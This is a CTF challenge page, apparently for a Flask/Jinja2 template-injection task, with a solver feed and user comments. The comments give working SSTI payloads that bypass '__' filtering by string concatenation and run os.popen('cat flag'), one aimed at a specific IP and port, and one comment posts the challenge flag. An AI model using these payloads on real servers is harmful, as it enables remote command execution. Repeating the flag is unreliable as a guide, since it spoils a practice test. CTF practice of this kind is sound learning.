评分(0)
暂无评分
解题动态
Zfc 攻破了该题 17小时前
xxggjj11 攻破了该题 2天前
ksw0513 攻破了该题 10天前
houguan 攻破了该题 13天前
DangerHe 攻破了该题 21天前
hhhh1213 攻破了该题 1月前
HamiLemon 攻破了该题 1月前
lalala2022 攻破了该题 1月前
kuku1024 攻破了该题 1月前
orr_ 攻破了该题 1月前
xujunjjj 攻破了该题 1月前
un 攻破了该题 2月前
devilrun 攻破了该题 2月前
mr.zhao 攻破了该题 2月前
huangwj 攻破了该题 2月前
lizhibin 攻破了该题 2月前
3xsh0re 攻破了该题 3月前
r1ng_13 攻破了该题 3月前
dyh1213 攻破了该题 3月前
评论
r1ng_13 3月前
举报
找到注入点,分镜直接秒
nakanodarling 1年前
举报
fenjing
yaozhiwang 1年前
举报
0xGame{fl4sk_sst1_ju5t_5o_s0,r1ght?}
xiaobai568 2年前
举报
wp可参考https://ctf.bugku.com/writeup/detail/id/1203.html
WCRH 2年前
举报
首先无脑尝试几个语句,很容易发现__被过滤,那就字符串拼接(其实还有class被过滤,这个比较难发现,只能一个个尝试)
单手压FL 2年前
举报
search={{url_for['_'+'_'+'globals'+'_'+'_']['os'].popen('cat flag').read()}}
jz1111 2年前
举报
http://82.157.146.43:18893/?search={{config['_'+'_'+'c'+'l'+'a'+'s'+'s'+'_'+'_']['_'+'_'+'init'+'_'+'_']['_'+'_'+'globals'+'_'+'_']['os'].popen('cat flag').read()}}
2728462336 2年前
举报
爆出传参search,利用字符串拼接绕过